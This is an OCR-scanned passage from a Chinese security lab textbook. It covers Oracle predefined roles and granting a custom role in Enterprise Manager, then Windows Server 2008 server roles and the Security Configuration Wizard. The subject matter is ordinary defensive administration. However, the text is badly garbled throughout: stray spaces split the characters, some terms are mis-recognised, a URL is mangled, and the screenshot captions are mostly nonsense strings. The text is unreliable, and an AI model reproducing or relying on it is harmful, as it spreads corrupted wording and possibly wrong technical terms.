角色 具有 以 下 特性 : 
角色 就 像 用 户 ， 可 以 授予 角色 或 撤销 角色 权限 。 
角色 就 像 系统 权限 ， 可 以 授予 用 户 或 其 他 和 角色， 也 可 以 从 用 户 或 其 他 角色 撤销 。 
角色 可 以 由 系统 权限 和 对 象 权限 组 成 。 
可 以 对 授予 某 一 角色 的 每 一 个 用 户 启用 或 禁用 该 角色 。 
可 能 需要 口令 才能 启用 角色 。 

e 角色 不 由 任何 用 户 拥 有 ， 和 角色 也 不 属于 任何 方案 。 

运行 数据 库 创建 脚本 时 会 为 Oracle 数据 库 自动 定义 若干 个 角色 。CONNECT 角色 会 
自动 授予 任何 使 用 Enterprise Manager 创建 的 用 户 。 在 数据 库 早 期 版 本 中 〈 早 于 Oracle 
Database 10g 版 本 2), CONNECT 角色 包含 更 多 的 权限 , 如 CREATE TABLE 和 CREATE 
DATABASELINK, 现在 ， 出 于 安全 原因 删除 了 这 些 权 限 。 注 : 请 注意 , 授予 RESOURCE 
角色 时 包括 授予 UNLIMITED TABLESPACE 权限 。 

下 面 介 绍 几 种 常用 的 、 主 要 的 预定 义 角 色 及 其 相关 的 权限 。 

1. CONNECT 
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. RESOURCE 
DBA 

. EXP FULL DATABASE 

. IMP FULL DATABASE 

. DELETE CATALOG ROLE 

. EXECUTE CATALOG ROLE 

. SELECT CATALOG ROLE 

说 明 : 

1 一 3: 是 为 了 同 Oracle 老 版 本 中 的 概念 相 兼 容 而 提供 的 , 不 能 只 依赖 于 这 些 ROLE。 
4 一 5: 是 为 了 使 用 Import 和 Export 实用 程序 而 提供 的 。 

6 一 8: 是 为 了 数据 字典 视图 和 包 的 卸载 而 提供 的 。 

CONNECT 角色 : 是 授予 最 终 用 户 的 典型 权利 ， 最 基本 的 。 
ALTER SESSION 一 一 修改 会 话 。 

CREATE CLUSTER 一 一 建立 聚 徐 。 

CREATE DATABASE LINK 一 一 建立 数据 库 链接 。 

CREATE SEQUENCE 一 一 建立 序列 。 

CREATE SESSION 一 一 建立 会 话 。 

CREATE SYNONYM 一 一 建立 同义词 。 

CREATE VIEW 一 一 建立 视图 。 

RESOURCE 角色 : 是 授予 开发 人 员 的 。 

CREATE CLUSTER 一 一 建立 聚 艇 。 

CREATE PROCEDURE 一 一 建立 过 程 。 

CREATE SEQUENCE 一 一 建立 序列 。 

CREATE TABLE 一 一 建 表 。 

CREATE TRIGGER 一 一 建立 触发 器 。 

CREATE TYPE 一 一 建立 类 型 。 

DBA 角色 : 拥有 系统 所 有 系统 级 权限 。 

IMP_FULL _DATABASE 角色 、EXP_ FULL_DATABASE 角色 : 
BACKUP ANY TABLE 一 一 备份 任何 表 。 

EXECUTE ANY PROCEDURE 一 一 执行 任何 操作 。 

SELECT ANY TABLE 一 一 查询 任何 表 。 
DELETE_CATALOG _ROLE 角色 : 

这 个 角色 是 Oracle 8 新 增加 的 ， 如 果 授予 用 户 这 个 角色 ， 用 户 就 可 以 从 表 sys.aud$ 


co 门人 wm PD 


中 删除 记录 ，sys.aud$ 表 中 记录 着 审计 后 的 记录 ， 使 用 这 个 角色 可 以 简化 审计 踪迹 管理 。 


SELECT_CATALOG ROLE 角色 、EXECUTE CATALOG ROLE 角色 : 
SELECT_CATALOG ROLE 角色 具有 从 数据 字典 查询 的 权利 ,EXECUTE_ CATALOG 


ROLE 角色 具有 从 数据 字典 中 执行 部 分 过 程 和 函数 的 权利 。 
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如 ，XDBADMIN 包含 管理 扩展 标记 语言 (XML) 数据 库 (如果 已 安装 此 功能 ) 所 需 的 
权限 AQ_ADMINISTRATOR_ROLE 提供 管理 高 级 队列 的 权限 HS_ADMIN_ROLE 包 
括 管理 各 种 服务 所 需 的 权限 。 在 没有 Oracle 技术 支持 协助 的 情况 下 ,一定 不 能 改变 授予 
这 些 功能 角色 的 权限 ， 因 为 这 样 做 可 能 会 无 意 禁 用 所 需 的 功能 。 

【实验 环境 】 

Oracle 10g 以 上 数据 库 系 统 。 


【实验 步骤 】 


1. 创建 角色 
(1) 以 SYS 用 户 登 录 Oracle Enterprise Manager， 选 择 【 服 务 器 】|【 安 全 性 】|【 角 


色 】 出现 角色 管理 界面 。 单 击 【 创 建 】 按 钮 ， 出 现 如 图 10-41 所 示 的 界面 。 在 【一 般 信 
息 】 页 中 输入 名 称 为 “test_role”。 


ORACLE Enterprise Manager 11g 
Database Control 


作为 SYS 登录 
ED GD GE 
] 一 般 信 息 | 角色 。 系统 权限 。 对 象 权 限 。 使 用 者 组 权限 


* 名称 test_role| 
验证 无 ~ 


数据 车 实 例 : webdb com > 角色 > 


创建 角色 


图 10-41 添加 角色 
(2) 角色 是 一 个 由 相关 权限 组 成 的 命名 组 ， 一 般 主要 用 于 管理 对 象 权限 ， 选 择 【 对 
象 权 限 】 页 ， 如 图 10-42 所 示 ， 在 【选择 对 象 类 型 】 中 选择 【 表 】 作 为 授予 权限 的 对 象 。 


ORACLE Enterprise Manager 11g 半 
Database Control | 


教 据 库 实例 : webdb com > 角色 > 作为 SYS 登录 
创建 角色 l 
(EAsQL ) (KN) (WE) 
二 磐 信息 。 角色 。 系统 权限 | 对 象 权限 使 用 者 组 权限 
和 达 择 对 象 类 到 有 且 天 汪 ~ (未 力 ) 
Le | 


对 象 权 限 使 用 者 组 权限 
(显示 SOL ) (取消 )( 确定 ) 
; 


图 10-42 添加 对 象 权限 
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歼 据 库 实例 - webdb com > 角色 > 
添加 表 对 象 权限 


“选择 表 对 象 


(SchemaName 表 ,…) 
选择 对 象 , 然后 过 邦 要 分 配 的 权限 
可 用 权限 


ALTER 
DELETE 
INSERT 
SELECT 
UPDATE 


10-43 ”编辑 对 象 权限 


(4) 与 前 面 管理 用 户 对 象 权限 类 似 ， 单 击 右上 侧 的 手电 简 状 的 【选择 表 对 象 】 按 钮 ， 
出 现 如 图 10-44 所 示 的 界面 ， 首 先 选择 方案 ， 然 后 单 击 【 开 始 】 按 钮 ， 出 现 该 方案 下 的 
表 对 象 ， 从 下 面 的 表 对 象 中 选择 表 ， 然 后 单 击 【确定 】 按 钮 。 选 择 方案 SCOTT， 选 择 表 
对 象 为 EMP， 单 击 【确定 】 按 钮 ， 出 现 如 图 10-45 所 示 的 界面 。 


[EYE 


X 

ES 区 去 EB" 

| 
四 3 位 允 


搜索 
要 查找 您 的 项 目 , 请 在 下 拉 列 表 中 选择 方案 , 并 在 文本 字段 中 输入 单词 , 然后 选择 
FE 按钮 。 要 查看 所 选 方案 中 所 有 表 的 列表 . 请 青 除 搜索 框 并 单 击 “" 开 始 " 按 


方案 SCOTT 


搜索 表 名 称 


全 选 | 全 部 不 先 


图 10-44 选择 对 象 
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ORACLE Enterprise Manager 119 和 人 
Database Control 


实例 : webdb com > 角色 > 作为 SYS 登录 


添加 表 对 象 权 限 

DJ 
* 选择 表 对 象 
SCOTT .EMP 二 


3 


(SchemaName 表 ,..) 
迁 择 对象, 然后 过 插 要 分 配 的 权限 
可 用 权限 


所 选 权限 
ALTER 
DELETE 2 


INSERT 


图 10-45 ”添加 对 象 权 限 


(5) 在 左 侧 的 【可 用 权限 】 列 表 中 显示 了 针对 表 SCOTT.EMP 所 示 的 权限 ， 选 择 一 
个 权限 ， 然 后 单 击 【 移 动 】 即 可 把 权限 赋予 用 户 ， 也 可 以 从 【所 选 权 限 】 列 表 中 ， 选 择 
一 个 权限 ， 然 后 单 击 【 移 去 】 按 钮 ， 去 除 一 个 用 户 的 对 象 权 限 。 对 象 权限 选择 完成 后 ， 
单 击 【确定 】 按 钮 ， 出 现 如 图 10-46 所 示 的 界面 。 


ORACLE Enterprise Manager 11g 从: 理 并 且 S 关 首 门 
Database Control 


数据 库 实例 : webdb com > 角色 > 作为 SYS 登录 


创建 角色 
ED CD 全 到 


二 般 信 息 。 角色 。 系统 权限 」 对 象 权 限 使 用 者 组 权限 
1 0) 


二 盘 信 息 。 角色 。 系统 权限 
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图 10-46 对象 权限 列表 


(6) 在 如 图 10-46 所 示 的 界面 中 用 户 可 以 继续 添加 其 他 对 象 权 限 ， 也 可 以 选择 一 个 
权限 ， 单 击 【删除 】 按 钮 ， 去 掉 一 个 对 象 权限 。 所 有 的 对 象 权 限 编辑 完成 后 ， 单 击 【 应 
用 】 按 钮 ， 把 对 象 权 限 赋予 用 户 ， 这 时 用 户 就 可 以 使 用 该 对 象 权 限 了 。 如 果 选 中 【授权 
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选项 】 复 选 框 ， 允 许 这 个 用 户 向 其 他 用 户 授 予 同一 访问 权限 。 

2. 将 角色 分 配给 用 户 

(1) 以 SYS 用 户 登 录 Oracle Enterprise Manager， 选 择 【 服 务 器 】|【 安 全 性 】|【 用 
户 】， 出 现 用 户 管理 界面 ， 如 图 10-27 所 示 。 选 择 用 户 test_user 〈 如 果 不 存在 ， 则 添加 一 
个 )， 单 击 【 编 辑 】 按 钮 ， 然 后 选择 【角色 】， 出 现 如 图 10-47 所 示 的 界面 。 添 加 新 用 户 
时 ， 系 统 会 赋予 用 户 一 个 默认 的 CONNECT 角色 。 该 角色 赋予 用 户 建立 数据 库 连 接 的 权 
限 ， 但 是 不 能 操作 数据 表 。 


ORACLE Enterprise Manager119 


Database Control 数据 库 


元 据 库 实例 webdb com > 用 户 > 作为 SYS 登录 
编辑 用 户 : TEST_USER 


操作 类 似 创 建 “~ (开始 (EE 未 5QL ) (GE 原 ) (CE 用 ) 
一 般 信 息 | 角色 | 系统 权限 ” 对象 权 限 。 限额 。 使 用 者 组 权限 。 代理 用 户 


| 


图 10-47 用 户 角 色 列 表 


(2) 单 击 【编辑 列表 】 按 钮 ， 出 现 如 图 10-48 所 示 的 界面 ， 在 左 侧 【可 用 角色 】 列 
表 中 显示 了 当前 系统 存在 的 角色 ， 选 中 一 个 角色 ， 然 后 单 击 【移动 】 按 钮 ， 则 把 该 角色 
赋予 用 户 ,在 右 侧 【所 选 角色 】 列 表 中 显示 了 赋予 用 户 的 角色 ， 选 择 一 个 , 然后 单 击 【 移 
去 】 按 钮 则 可 以 去 掉 用 户 的 角色 。 这 里 把 刚才 添加 的 test_role 角色 赋予 用 户 。 完 成 后 单 


ORACLE Enterprise Manager 119 Sa 
Database Control 4 


数据 库 实例 : webdb com > 用 户 > 作为 SYS 登录 


修改 角色 _ 
全 加 所 到 


可 用 角色 所 选 角 色 


SPATIAL WFS_ADMIN CONNECT 
WFS_USR_ROLE > 
WM_ADMIN_ROLE 

XDBADMIN 

XDB_SET_INVOKER 

XDB_WEBSERVICES 

XDB_WEBSERVICES_OVER_HTTP 
XDB_WEBSERVICES_WITH_PUBLIC 


图 10-48 选择 用 户 角 色 列 表 
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击 【 确 定 】 按 钮 ， 返 回 用 户 角色 列表 ， 如 图 10-47 所 示 ， 然 后 单 击 【应 用 】 按 钮 ， 把 赋 
予 的 角色 应 用 到 用 户 。 


【实验 报告 】 
按照 实验 步骤 完成 实验 ， 并 记录 实验 过 程 。 


【思考 题 】 
分 析 使 用 角色 对 用 户 进行 权限 管理 有 什么 优 缺 点 。 
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第 开 重 
服务 器 安全 配置 


和 1 Windows Server 安全 配置 


微软 新 一 代 服 务 器 操作 系统 平台 Windows Server 2008 以 其 安全 、 稳定 而 受到 了 用 户 
的 肯定 ， 依 托 全 新 的 平台 架构 ， 为 企业 的 管理 、 数 据 安全 以 及 应 用 的 稳定 都 带 来 了 全 新 
的 革命 。 

Windows Server 2008 提供 了 一 系列 安全 技术 ,增强 了 对 操作 系统 的 保护 ， 为 企业 的 
运营 和 发 展 葛 定 了 坚实 的 基础 。Windows Server 2008 提供 了 减 小 内 核 攻击 面 的 安全 创新 
(例如 Patch Guard)， 使 服务 器 环境 更 安全 、 更 稳定 。 通 过 保护 关键 服务 器 服务 使 之 免 受 
文件 系统 、 注 册 表 或 网 络 中 异常 活动 的 影响 ，Windows 服务 强化 有 助 于 提高 系统 的 安全 
性 。 借 助 网 络 访问 保护 (NAP)、 只 读 域 控制 器 (RODC)、 公 钥 基 础 结构 (PKI) 增强 功 
能 、Windows 服务 强化 、 新 的 双向 Windows 防火 墙 和 新 一 代 加 密 支持 ，Windows Server 
2008 操作 系统 中 的 安全 性 也 得 到 了 增强 。 


11.1.1 Windows Server 配置 管理 


【实验 目的 】 
了 解 Windows Server 2008 配置 管理 方法 。 
【原理 简介 】 


Windows Server 2008 中 包括 三 种 主要 类 别 的 角色 : 标识 和 访问 管理 (作为 Active 
Directory 一 部 分 的 角色 )、 基 础 结构 〈 包 括 文件 服务 器 、 打 印 服务 器 、DNS 等 ) 以 及 应 
用 程序 (如 Web 服务 器 角色 和 终端 服务 )。Windows Server 2008 随 附 了 大 约 17 个 服 
务 器 角色 (例如 Active Directory 证 书 服务 、 网 络 策略 和 访问 服务 以 及 Windows Server 
虚拟 化 等 ;。 其 他 额外 的 角色 如 流 媒体 服务 角色 可 以 通过 下 载 来 获得 。 

服务 器 角色 说 明 服 务 器 的 主要 功能 。 管 理 员 可 以 选择 整个 计算 机 专用 于 一 个 服务 器 
角色 , 或 在 单 台 计算 机 上 安装 多 个 服务 器 角色 , 每 个 角色 可 以 包括 一 个 或 多 个 角色 服务 。 
以 下 服务 器 角色 在 Windows Server 2008 中 可 用 ， 可 以 使 用 服务 器 管理 器 进行 安装 和 管 
理 。 服 务 器 角色 如 表 11-1 所 示 。 

Windows Server 2008 操作 系统 通过 新 的 服务 器 管理 器 控制 台 缓 解 了 企业 管理 和 保 
护 多 个 服务 器 角色 所 面临 的 压力 。Windows Server 2008 中 的 服务 器 管理 器 提供 单一 源 ， 
用 于 管理 服务 器 的 标识 及 系统 信息 、 显 示 服 务 器 状态 、 标 识 服 务 器 角色 配置 问题 ， 以 及 
管理 服务 器 上 已 安装 的 所 有 角色 。 


角色 名 称 


Active Directory 证 
书 服务 


Active Directory 域 


服务 


Active Directory 联 
合身 份 验证 服务 


Active Directory 轻 
型 目录 服务 


Active Directory 权 
限 管理 服务 (AD 
RMS) 


应 用 程序 服务 器 
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表 11-1 服务 器 角色 
描 述 


Active Directory(R) 证 书 服务 (AD CS) 提供 可 自 定义 的 服务 ， 用 于 创建 并 管理 
在 采用 公 钥 技术 的 软件 安全 系统 中 使 用 的 公 钥 证 书 。 组 织 可 使 用 Active 
Directory 证 书 服务 通过 将 个 人 、 设 备 或 服务 的 标识 与 相应 的 私 钥 进行 绑 定 来 
增强 安全 性 。 Active Directory 证 书 服务 还 包括 允许 在 各 种 可 伸缩 环境 中 管理 证 
书 注册 及 吊销 的 功能 。 

Active Directory 证 书 服务 所 支持 的 应 用 领域 包括 安全 /多 用 途 Internet 邮件 扩 
展 (CSMIME) 、 安 全 的 无 线 网 络 、 虚 拟 专用 网 络 (VPN) 、Iternet 协议 安全 
(Ipsec) 、 加 密 文件 系统 (EFS) 、 智 能 卡 登录 、 安 全 套 接 字 层 /传输 层 安 全 
(SSL/TLS) 以 及 数字 签名 


Active Directory 域 服务 (AD DS) 存储 有 关 网 络 上 的 用 户 、 计 算 机 和 其 他 设备 
的 信息 。AD DS 帮助 管理 员 安全 地 管理 此 信息 并 促使 在 用 户 之 间 实 现 资 源 共 
享 和 协作 。 此 外 , 为 了 安装 启用 目录 的 应 用 程序 (如 Microsoft Exchange Server) 
并 应 用 其 他 Windows Server 技术 (如 “组 策略 ”) ， 还 需要 在 网 络 上 安装 AD 
DS 

Active Directory 联合 身份 验证 服务 (AD FS) 提供 了 单一 登录 (SSO) 技术 ， 
可 使 用 单一 用 户 账 户 在 多 个 Web 应 用 程序 上 对 用 户 进行 身份 验证 。AD FS 通 
过 以 下 方式 完成 此 操作 : 在 伙伴 组 织 之 间 以 数字 声明 的 形式 安全 地 联合 或 共享 
用 户 标识 和 访问 权限 

对 于 其 应 用 程序 需要 用 目录 来 存储 应 用 程序 数据 的 组 织 而 言 , 可 以 使 用 Active 
Directory 轻型 目录 服务 (AD LDS) 作为 数据 存储 方式 。AD LDS 作为 非 操 作 
系统 服务 运行 ， 因 此 ， 并 不 需要 在 域 控制 器 上 对 其 进行 部 署 ， 可 允许 多 个 AD 
LDS 实例 在 单 台 服 务 器 上 同时 运行 ， 并 且 可 针对 每 个 实例 单独 进行 配置 ， 从 
而 服务 于 多 个 应 用 程序 

AD RMS 是 一 项 信息 保护 技术 ， 可 与 启用 了 AD RMS 的 应 用 程序 协同 工作 ， 
帮助 保护 数字 信息 免 遭 未 经 授权 的 使 用 。 内 容 所 有 者 可 以 准确 地 定义 收 件 人 可 
以 使 用 信息 的 方式 ， 例 如 ， 谁 能 打开 、 修 改 、 打 印 、 转 发 或 对 信息 执行 其 他 操 
作 。 组 织 可 以 创建 自 定义 的 使 用 权限 模板 ， 如 “机 密 -只 读 ”， 此 模板 可 直接 
应 用 到 诸如 财务 报表 、 产 品 说 明 、 客 户 数据 及 电子 邮件 之 类 的 信息 

应 用 程序 服务 器 提供 了 完整 的 解决 方案 , 用 于 托管 和 管理 高 性 能 分 布 式 业 务 应 
用 程序 .诸如 .NET Framework、Web 服务 器 支持 、 消 息 队 列 、.COM+、Windows 
Communication Foundation 和 故障 转移 群集 之 类 的 集成 服务 有 助 于 在 整个 应 用 
程序 生命 周期 (从 设计 与 开发 直到 部 署 与 操作 ) 中 提高 工作 效率 


动态 主机 配置 协议 
(DHCP) 服务 器 


动态 主机 配置 协议 允许 服务 器 将 卫 地 址 分 配给 作为 DHCP 客户 端 启用 的 计 
算 机 和 其 他 设备 ， 也 允许 服务 器 租用 IP 地 址 。 通 过 在 网 络 上 部 署 DHCP 服 
务 器 ， 可 为 计算 机 及 其 他 基于 TCP/IP 的 网 络 设备 自动 提供 有 效 的 IP 地 址 及 
这 些 设备 所 需 的 其 他 配置 参数 ( 称 为 DHCP 选项 ) ， 这 些 参数 允许 它们 连接 
到 其 他 网 络 资源 ， 如 DNS 服务 器 、WINS 服务 器 及 路 由 器 


域名 系统 (DNS ) 提供 了 一 种 将 名 称 与 mtemet 数字 地 址 相关 联 的 标准 方法 。 
这 样 ， 用户 就 可 以 使 用 容易 记 住 的 名 称 代替 一 长 串 数字 来 访问 网 络 计算 机 。 在 


DNS 服务 器 Windows 上 ， 可 以 将 Windows DNS 服务 和 动态 主机 配置 协议 (DHCP) 服务 
集成 在 一 起 ， 这 样 在 将 计算 机 添加 到 网 络 时 ， 就 无 须 添加 DNS 记录 
传真 服务 器 传真 服务 器 可 发 送 和 接收 传真 ， 并 允许 管理 这 台 计 算 机 或 网 络 上 的 传真 资源 ， 


例如 作业 、 设 置 、 报 告 以 及 传真 设备 等 
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续 表 
角色 名 称 描 述 
文件 服务 文件 服务 提供 了 实现 存储 管理 、 文 件 复制 、 分 布 式 命名 空间 管理 、 快 速 文件 搜 
索 和 简化 的 客户 端 文件 访问 等 技术 
Hyper-V 提供 服务 ， 可 以 使 用 这 些 服 务 创建 和 管理 虚拟 机 及 其 资源 。 每 个 虚拟 
Hyper-VTM 机 都 是 一 个 在 独立 执行 环境 中 运行 的 虚拟 化 计算 机 系统 。 这 允许 用 户 同时 运行 


多 个 操作 系统 


网 络 策略 和 访问 
服务 


打印 服务 


终端 服务 


通用 描述 、 发 现 和 集 
成 服务 


Web 服务 器 (IIS) 


Windows 部 署 服务 


网 络 策略 和 访问 服务 提供 了 多 种 方法 ,可 向 用 户 提供 本 地 和 远程 网 络 连接 及 连 
接 网 络 段 ， 并 允许 网 络 管理 员 集 中 管理 网 络 访问 和 客户 端 健康 策略 。 使 用 网 络 
访问 服务 ， 可 以 部 署 VPN 服务 器 、 拨 号 服务 器 、 路 由 器 和 受 802.11 保护 的 
无 线 访问 。 还 可 以 部 署 RADIUS 服务 器 和 代理 ， 并 使 用 连接 管理 器 管理 工具 
包 来 创建 允许 客户 端 计算 机 连接 到 网 络 的 远程 访问 配置 文件 

可 以 使 用 打印 服务 来 管理 打印 服务 器 和 打印 机 。 打 印 服务 器 可 通过 集中 打印 机 
管理 任务 来 减少 管理 工作 负荷 

终端 服务 所 提供 的 技术 允许 用 户 从 几乎 任何 计算 设备 访问 安装 在 终端 服务 器 
上 的 基于 Windows 的 程序 ， 或 访问 Windows 桌面 本 身 。 用 户 可 连接 到 终端 
服务 器 来 运行 程序 并 使 用 该 服务 器 上 的 网 络 资源 

通用 描述 、 发 现 和 集成 UDDI) 服务 ， 用 于 在 组 织 的 Intranet 内 部 、Extranet 
上 的 业务 合作 伙伴 之 间 以 及 Intemet 上 共享 有 关 Web 服务 的 信息 。 UDDI 服 
务 通过 更 可 靠 和 可 管理 的 应 用 程序 提高 开发 人 员 和 IT 专业 人 员 的 工作 效率 。 
UDDI 服务 通过 加 大 现 有 开发 工作 的 重复 利用 ， 可 以 避免 重复 劳动 

使 用 Web 服务 器 (IIS) 可 以 共享 Internet、Intranet 或 Extranet 上 的 信息 。 它 
是 统一 的 Web 平台 ， 集 成 了 ITS 7.0、ASP.NET 和 Windows Communication 
Foundation。IIS 7.0 还 具有 安全 性 增强 、 诊 断 简化 和 委派 管理 等 特点 

可 以 使 用 Windows 部 署 服务 在 带 有 预 启 动 执行 环境 (PXE) 启动 ROM 的 计 
算 机 上 远程 安装 并 配置 Windows 操作 系统 。WdsMgmt Microsoft 管理 控制 台 
(MMC) 管理 单元 可 管理 Windows 部 署 服 务 的 各 个 方面 ， 实 施 该 管理 单元 将 
减少 管理 开销 Windows 部 署 服务 还 可 以 为 最 终 用 户 提 供与 使 用 Windows 安 
装 程序 相 一 致 的 体验 


服务 器 管理 器 也 消除 了 管理 员 在 部 团 服 务 器 前 运行 安全 配置 向 导 的 要 求 ， 默 认 情况 
下 服务 器 角色 使 用 推荐 的 安全 设置 进行 配置 ， 一 旦 安装 并 配置 正确 即 可 部 署 。 
服务 器 管理 器 允许 管理 员 使 用 单个 工具 就 可 完成 以 下 任务 ， 从 而 使 服务 器 管理 更 


高 效 。 


e 查看 和 更 改 服务 器 上 已 安装 的 服务 器 角色 及 功能 。 
e 执行 与 服务 器 的 运行 生命 周期 相关 联 的 管理 任务 , 如 启动 或 停止 服务 以 及 管理 本 
地 用 户 账户 。 

e 执行 与 服务 器 上 已 安装 角色 的 运行 生命 周期 相关 联 的 管理 任务 。 

。 确定 服务 器 状态 ， 识 别 关键 事件 ， 分 析 并 解决 配置 问题 和 故障 。 

e 使 用 Windows 命令 行 安装 或 删除 角色 、 角 色 服 务 和 功能 。 

在 发 布 环境 中 进行 配置 之 前 ， 所 有 的 系统 都 应 当 加 固 。 加 固 过 程 除 了 运用 服务 包 和 
安全 补丁 来 修复 已 知 的 弱点 外 ， 还 应 当 删 除 不 使 用 的 操作 系统 特性 及 其 服务 ， 从 而 避免 
在 不 使 用 的 特性 中 发 现 新 的 弱点 。 在 加 固 过 程 中 应 当 确保 自己 的 系统 配置 尽 可 能 的 安全 。 
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对 系统 保护 的 目标 是 使 得 系统 很 难 攻破 ， 使 黑客 尝试 的 成 本 和 努力 要 大 于 他 可 能 得 到 的 
收获 。 

在 Windows Server 2008 中 ， 可 以 使 用 安全 配置 向 导 (SCW) 通过 修改 角色 、 角 色 服 
务 和 功能 的 安全 设置 来 减少 服务 器 的 受 攻击 面 。 使 用 SCW 可 帮助 在 使 用 服务 器 管理 器 
初始 安装 角色 之 后 维护 安全 的 服务 器 配置 。 

安全 配置 向 导 (SCW) 可 以 帮助 用 户 完成 创建 、 编 辑 、 应 用 或 回 滚 安全 策略 的 过 程 。 
它 提 供 了 根据 角色 创建 或 修改 服务 器 的 安全 策略 的 便捷 方法 。 然 后 ， 可 以 使 用 组 策略 将 
该 安全 策略 应 用 于 执行 相同 角色 的 多 个 目标 服务 器 。 还 可 以 针对 恢复 目的 ， 使 用 SCW 
将 某 个 策略 回 滚 到 其 以 前 配置 。 使 用 SCW， 可 以 将 服务 器 的 安全 设置 与 所 需 的 安全 策 
略 进行 比较 ， 以 检查 系统 中 有 漏洞 的 配置 。 

在 微软 公司 的 网 站 上 有 关于 Windows 服务 器 的 安全 配置 的 指南 文件 ， 详 情 参 考 : 
http:/go.microsoft.comy/fwlink/?LinkId=48541。 


【实验 环境 】 
Windows Server 2003 以 上 操作 系统 。 


【实验 步骤 】 
1. 服务 器 角色 管理 工具 
(1) 单 击 【开始 】 菜 单 中 的 【管理 工具 】 中 的 【服务 器 管理 器 】 人 快捷 菜单 ， 出 现 如 
图 11-1 所 示 的 管理 界面 。 
已 服务 器 管理 加 
文件 @) 操作 查看 W) 帮助 00 
鲍 四 | 当 | 厨 | 日 


ED 
FE 


RS BD 二， 以 有 双色 和 中 


人 ^ 角色 摘要 角色 摘要 帮助 | 


全角 色 : 已 安装 1 哄 17) 高 添加 角色 
各 出 疼 角 色 


Web 服务 器 CIS) 
人 ^ Yeb 服务 器 CIIS) Web 服务 器 CIS) 
提供 可 靠 、 可 管理 并 且 可 扩展 的 Yeb 应 用 程序 基础 结构 。 
全 角色 状态 加 转 到 Yeb 服务 器 C 


消息 : 无 
系统 服务 : 4 正在 运行 ，2 已 停止 | 
> 


1 加 | 个 上 次 出 杀 时 间 : 2011/8/23 9:13:39 配置 捉 新 


图 11-1 服务 器 管理 器 


(2) 单 击 右 侧 窗 口中 的 【添加 角色 】 选 项 ， 出 现 【 添 加 角色 向 导 】 如 图 11-2 所 示 。 
(3) 单 击 【 下 一 步 】 按 钮 ， 出 现 【服务 器 角色 】 向 导 页 ， 在 右 侧 选择 【网 络 策略 和 
访问 服务 】 如 图 11-3 所 示 ， 然 后 单 击 【下 一 步 】 按 钮 。 
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1 te ge 
Windows Update 和 


如 果 您 必须 完成 上 述 的 任何 部 弛 ， 请 取消 该 向 导 ， 完 成 步骤 ， 然 后 再次 运行 向 导 。 
着 要 继续 ,请 单 击 “ 下 一 步 ”。 


厂 默认 情况 下 将 跳 过 此 页 6) 


5 ED 取消 
图 11-2 添加 角色 向 导 
添加 角色 向 导 划 
褒 : 选择 服务 器 角色 
选择 要 安装 在 此 服务 器 上 的 一 个 或 多 个 角色 。 
角色 吕 ) 描述 ; 


DD Active Directory Rights Nanagenent Services 


| 吕 hetve Direetery ets Wanewmant Servieee 加 和 六 有 和 访问 有 和 提供 赂 第 格 
日 Aetive pireetery 联合 身份 验证 服务 最 和 坝 和 从 ao 将 全 


口 Active Directory 轻型 目录 服务 权 协 议 QCAP)， 这 些 将 有 助 十 PP 括 
口 Active Directory 域 服务 的 健康 和 安全 。 


口 hctive Directory 证 书 服务 


目 inaors Server je Services 


口 Windows 部 署 服 


日 和 
口 终端 服务 


< |[F Sm ?| 三 半 亲 取消 
图 11-3 选择 服务 角色 
(4) 在 【角色 服务 】 向 导 页 ， 选 择 全 部 的 角色 服务 ， 然 后 单 击 【 下 一 步 】 按 钮 ， 如 
图 11-4 所 示 。 
(5) 接 下 来 的 几 个 向 导 页 ， 可 以 直接 采用 系统 的 默认 值 ， 也 可 以 根据 实际 情况 进行 


修改 ， 最 后 的 选择 结果 如 图 11-5 所 示 。 然 后 单 击 【安装 】 按 钮 ， 启 动 安装 ， 安 装 之 后 需 
要 重新 启动 服务 器 才能 全 部 成 功 。 
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添加 角色 向 导 
》 选择 角色 服务 
开始 之 前 选择 为 网 络 第 史 和 访问 服务 安装 的 角色 服务 
服务 器 角色 角色 服务 @): 指 壕 : 
网 络 策略 和 访问 服务 主机 年 据 授 可 协 议 DCAP) 允许 集成 
世芳 ee 
还; Io] 
证 书包 发 机 构 其 好 时 ，IES 可 以 执行 对 ce 
身份 验证 要 求 网 络 访问 控制 客 
服务 器 身份 验证 证 书 
Web 服务 器 CTS) 
角色 服务 
确认 
进度 
结果 
RES | > um | ww | 
图 11-4 选择 角色 服务 
EE Ee] 
国 
确认 安装 选择 
本 全 车 要 安装 以 下 角色 、 角色 服务 或 功能 ， 请 单机 “安装 ”。 
网 络 第 榴 和 访问 服务 二 1 警告 ，2 条 信息 性 消息 显示 如 下 
角色 服务 
2 的 匿名 请 求 
区 证 
的 二 i 使 用 选择 的 证 书 
区 人 由 使 用 选择 的 证 书 
角色 服务 和 Active Directery 证 书 服 务 
安装 类 型 证 书 颁发 机 构 
外 支 装 了 证 书 售 发 机 构 之 后 ， 持 无 法 更 改 此 计算 机 的 名 称 和 域 设置 。 
以 类 型 CA 类 型 独立 根 
利 钥 CSP RSAMMicrosoft Software Key Storage Proyider 
哈 希 算法 shal 
加 密 密 钥 长 度 2048 
CA 名 称 允许 CSP 交互 操作 已 大 用 
证 书 有 效 期 2016/8/23 9:21 
有 效 其 可 分 辩 名 称 : CN=YEBSERYER-CA 
证 书 数 据 库 人 5 Ce 
证 日 志 位 C:\Windows\systen32\CertLo: 
和 证 书 自发 机 构 Ye 注册 ee ”| 
角色 服务 Ra 
| ee = | 打印 、 保 存 或 通过 电子 邮件 发 送 此 信息 
进度 
问 果 < 上 - 步 @) | 下 - 乞 闸 了 取消 
图 11-5 ”安装 选项 
2. 安全 配置 向 导 


(1) 单 击 【开始 】 菜 单 中 的 【管理 


图 11-6 所 示 的 向 导 界 面 。 


工具 】 中 的 【安全 配置 向 导 】 人 快捷 菜单 ， 出 现 如 


205 


安全 配置 向 导 Xl 
欢迎 使 用 安全 配置 向 导 


上 人生 


i 
和 9 的， 请 运 


若 要 继续 ， 请 单 击 “ 下 一 步 ”。 


了 和解 有 关 安全 配 轩 向 号 的 更 多 信息 。 


/sur ws | 
图 11-6 ”安全 配置 向 导 
(2) 单 击 【 下 一 步 】 按 钮 ， 进 入 【配置 操作 】 向 导 页 ， 可 以 创建 新 的 安全 策略 ， 编 
辑 现 有 安全 策略 ， 应 用 现 有 安全 策略 或 者 回 滚 上 一 次 应 用 的 安全 策略 。 在 此 选择 【新 建 
安全 策略 】 如 图 11-7 所 示 。 


安全 配置 向 导 


观 有 去 全 第 酥 文件 各 ) 


浏览 全 


了 解 有 关 配 置 提 作 的 更 多 信息 。 


— my | 
图 11-7 配置 操作 界面 


